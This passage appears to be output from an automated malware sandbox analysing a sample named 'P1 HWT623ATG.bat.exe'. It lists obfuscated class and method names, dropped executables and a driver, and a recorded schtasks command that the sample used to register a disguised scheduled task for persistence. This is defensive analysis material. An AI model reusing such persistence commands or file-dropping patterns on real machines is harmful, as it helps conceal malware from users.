Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, UweUfDTNqoWbI1Olm6.cs	High entropy of concatenated method names: 'soTYQYCH1A', 'EvcYyleQ34', 'TwtYS8lET0', 'CQASLP8BT5', 'FYuSz4SEsC', 'VUxY8gTQgV', 'whUY7p1LJZ', 'CjfYrBTdwW', 'anxYTDRt6J', 'qbMYlKm3M9'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, suQaChQd9xLiBcArN6.cs	High entropy of concatenated method names: 'EymU9hp9qy', 'KewUZRKktq', 'zDZUBKMhZw', 'DDwUqWkHS7', 'kXXURBq7my', 'T4xUd4nnfk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, S12h4verlINyR2XZ17.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cx2rAOCadQ', 'FCUrLcH5NH', 'gXDrzl2UGo', 'FDST8clyn8', 'SbRT7qxNTF', 'pkMTrfgP3a', 'KhvTTQJYZX', 'CXiTr5qpXkXBXDSFdwE'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, aah938iUx3YME6xSJG.cs	High entropy of concatenated method names: 'TrSv717pm6', 'E7UvTMsKuq', 'IjkvlsUTsv', 'I94vQOQbhu', 'mT5va9Q7lo', 'ungv61v3It', 'WlpvSJ0ZTe', 'EvcUm264YP', 'RWSUCLbbpr', 'TpsUAsjHZT'
Source: 1.2.P1 HWT623ATG.bat.exe.7c70000.12.raw.unpack, GDJBwVybNjOcuS31Hc.cs	High entropy of concatenated method names: 'hPe2V1Gxa9', 'ctX2ivAP4u', 'q4I29TKdB0', 'rT92ZgMRDY', 'qIy2qNHMG8', 'NVJ2dBrPHE', 'tSU2PaP4IB', 'Qsa2306e4c', 'Hes2WD9ZCF', 'JqC2whfaX1'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, NRVK2hJ6dXJNQyKZOO.cs	High entropy of concatenated method names: 'ToString', 'ka7GwS8glg', 'k36GZUZ7CB', 'd94GB9bJHU', 'hqNGqJOklO', 'eSdGd6Mk2M', 'f5HGhPHfnd', 'o2xGPYdohx', 'JXTG3W92Fu', 'FsqGFSqKH6'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, KNppUKr85kkwKH4qwo.cs	High entropy of concatenated method names: 'h4rUQ3ENSl', 'C9KUanZHxW', 'HZ6Uy9BL8o', 'whvU66qlp6', 'aglUSg9rMJ', 'ocqUYnTI4u', 'eKDUcO0bhZ', 'E8cUN26IxA', 'RORUJMlZu1', 'ac7UEUuwUJ'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, FcbtOO8WgfsF9hQ5gx.cs	High entropy of concatenated method names: 'vxSaRsOIEy', 'FNRaebSv87', 'twrapcNke7', 'YWCa4dwZBU', 'anNajAVgqf', 'TTuaftkqDC', 'k2oamKa80d', 'ogcaCbTYTG', 'fABaAOSZ1G', 'bsCaLj6bOM'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, HJwCVeVbbxipNAU9GT.cs	High entropy of concatenated method names: 'fUaSMFj1jE', 'ScuSahOX8l', 'd26S61jWbo', 'I34SYK67Bo', 'xsYScuiDHr', 'sQF6jmbhao', 'Xdf6fq4C8L', 'wPF6mwlVvC', 'XQj6C2JK73', 'dQ16AH65Au'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, aQJnHScI5wvZXZMTWm.cs	High entropy of concatenated method names: 'Dispose', 'g7c7Aiwq7S', 'qOcrZYuqsd', 'ptvDDItpY6', 'C5F7LpSDqp', 'i2T7zCsZVq', 'ProcessDialogKey', 'R2Nr8GkSRX', 'Optr7GRrQ1', 'aoRrrCVtPS'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, l6XwAUzWixuITKWwX4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T2tv2o3Xmn', 'UTFvoFx5Mc', 'usEvGDJmoN', 'tP4v5EM91Z', 'uQ3vUvxwTh', 'xgWvvx90G5', 'KcHvkVwklE'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, V1MXp9MZRVUG2WnmBe.cs	High entropy of concatenated method names: 'LOd5CRkJpm', 'hWu5LjFuQP', 'fYMU8dJjBH', 'bdaU7JGGH9', 'API5w1tBYZ', 'Vse5nXvHH7', 'hoR5XDdTx0', 'VpC5Rg8ZDK', 'oye5eCQ000', 'HI25pc74Ov'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, bDmkrJF0yMmG3cWhFP.cs	High entropy of concatenated method names: 'GYfyOuWSkM', 'Gv9yIsyeqs', 'ITvyV3WjFN', 'YXEyi2SjAs', 'VGTyouNxGi', 'FsEyG7AAUa', 'I6Yy5hkRDM', 'cCoyULUVIh', 'lQHyv8E8mm', 'dpaykgMpwS'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, s1DyL6nIr3WcZnwnks.cs	High entropy of concatenated method names: 'XxrTMXvM3s', 'rkeTQavVUc', 'sYkTa1KDHR', 'OqNTy0wfun', 'xdMT6UkmtI', 'jgLTSgYcY0', 'knYTY6QfFr', 'lVITc3xHvg', 'u5vTN0C2pl', 'sJnTJ9Krpc'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, y1ISFm1UW32ChpJwDw.cs	High entropy of concatenated method names: 'B6M7YFImdT', 'K5k7cP5gH6', 'afv7Jiu40i', 'QUS7EhSXyF', 'UYv7ol5Wts', 'mtX7GD02pc', 'WRvkjyKspom3KMHwIv', 'lP0wBNuQ4LhwN55i59', 'exy77xSduM', 'My97TqMRvO'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, CeFBhkjXl7DfEU5pnic.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'F0SkRQCtym', 'eI7keP2KSP', 'JVekpRuPJu', 'dQak4sejCx', 'qk1kjw4HPV', 'dxmkfZHna1', 'GmVkmuafNB'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, mq96kWukfK2Q9hUELT.cs	High entropy of concatenated method names: 'EXibIJjLk', 'F8uO41ANo', 'u5OI4MqsE', 'v0b1SKyYw', 'MGdila3sm', 'zODuiiTYD', 'r2cRcOIaSAkpN1lV3G', 'HyahwmctveqvyR6wxB', 'Gh6UqQojS', 'uBWk6pHLQ'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, vQeePpjddQ8t34fOAnU.cs	High entropy of concatenated method names: 'r0SvHtcNlU', 'eLQv0gQlLL', 'KravbiplKh', 'U1YvONek55', 'He5vgvkaDM', 'YgivIhNEwR', 'j9Fv1xiQCs', 'tjCvVEV1Ee', 'LqoviNXAfp', 'uCBvuG7GZ6'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, rAn20DjuqaPuLG6SOA8.cs	High entropy of concatenated method names: 'gSDkHWkxn9', 'JNYk0gZ5O8', 'bojkbmgGxE', 'KwfJR9pcKhyd25CRnZ1', 's6hiwdpPevI7gKoyEBV', 'zLGuL5pB6IdX3FjNPR5', 'AWcjEhpraxGn07OK4Xy'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, Pp2hjWWk1HDNpyBeLi.cs	High entropy of concatenated method names: 'fOTYHBlsB9', 'QjvY0sgA34', 'Tl8YbapZuZ', 'PQeYO1mL1J', 'OH1YgdJRtf', 'iuFYIbJTWK', 'Xr9Y1QnLOL', 'MmIYVxC0qU', 'MDPYiu6kJR', 'ax1YuvjDWk'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, jKhuK7lYn9WVynG1co.cs	High entropy of concatenated method names: 'P9OoWow4nm', 'Hocont8fpP', 'DAZoRW9BFs', 'XdGoewkelT', 'CypoZspnr9', 'gmKoBkM5jG', 'njxoqdrggw', 'd5codKQlBZ', 'QZ7ohp28yI', 'SgXoPiOkEU'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, UweUfDTNqoWbI1Olm6.cs	High entropy of concatenated method names: 'soTYQYCH1A', 'EvcYyleQ34', 'TwtYS8lET0', 'CQASLP8BT5', 'FYuSz4SEsC', 'VUxY8gTQgV', 'whUY7p1LJZ', 'CjfYrBTdwW', 'anxYTDRt6J', 'qbMYlKm3M9'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, suQaChQd9xLiBcArN6.cs	High entropy of concatenated method names: 'EymU9hp9qy', 'KewUZRKktq', 'zDZUBKMhZw', 'DDwUqWkHS7', 'kXXURBq7my', 'T4xUd4nnfk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, S12h4verlINyR2XZ17.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cx2rAOCadQ', 'FCUrLcH5NH', 'gXDrzl2UGo', 'FDST8clyn8', 'SbRT7qxNTF', 'pkMTrfgP3a', 'KhvTTQJYZX', 'CXiTr5qpXkXBXDSFdwE'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, aah938iUx3YME6xSJG.cs	High entropy of concatenated method names: 'TrSv717pm6', 'E7UvTMsKuq', 'IjkvlsUTsv', 'I94vQOQbhu', 'mT5va9Q7lo', 'ungv61v3It', 'WlpvSJ0ZTe', 'EvcUm264YP', 'RWSUCLbbpr', 'TpsUAsjHZT'
Source: 1.2.P1 HWT623ATG.bat.exe.44e54c0.8.raw.unpack, GDJBwVybNjOcuS31Hc.cs	High entropy of concatenated method names: 'hPe2V1Gxa9', 'ctX2ivAP4u', 'q4I29TKdB0', 'rT92ZgMRDY', 'qIy2qNHMG8', 'NVJ2dBrPHE', 'tSU2PaP4IB', 'Qsa2306e4c', 'Hes2WD9ZCF', 'JqC2whfaX1'

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Local\Temp\bfc.exe

File created: C:\Users\user\AppData\Local\erindres\keres\skuboppernes.sys

Source: C:\Windows\SysWOW64\compact.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Guzzler[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\compact.exe	File created: C:\Users\user\AppData\Local\Temp\bfc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	File created: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Smilet.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GnVIdcfKFYG" /XML "C:\Users\user\AppData\Local\Temp\tmpC293.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\P1 HWT623ATG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
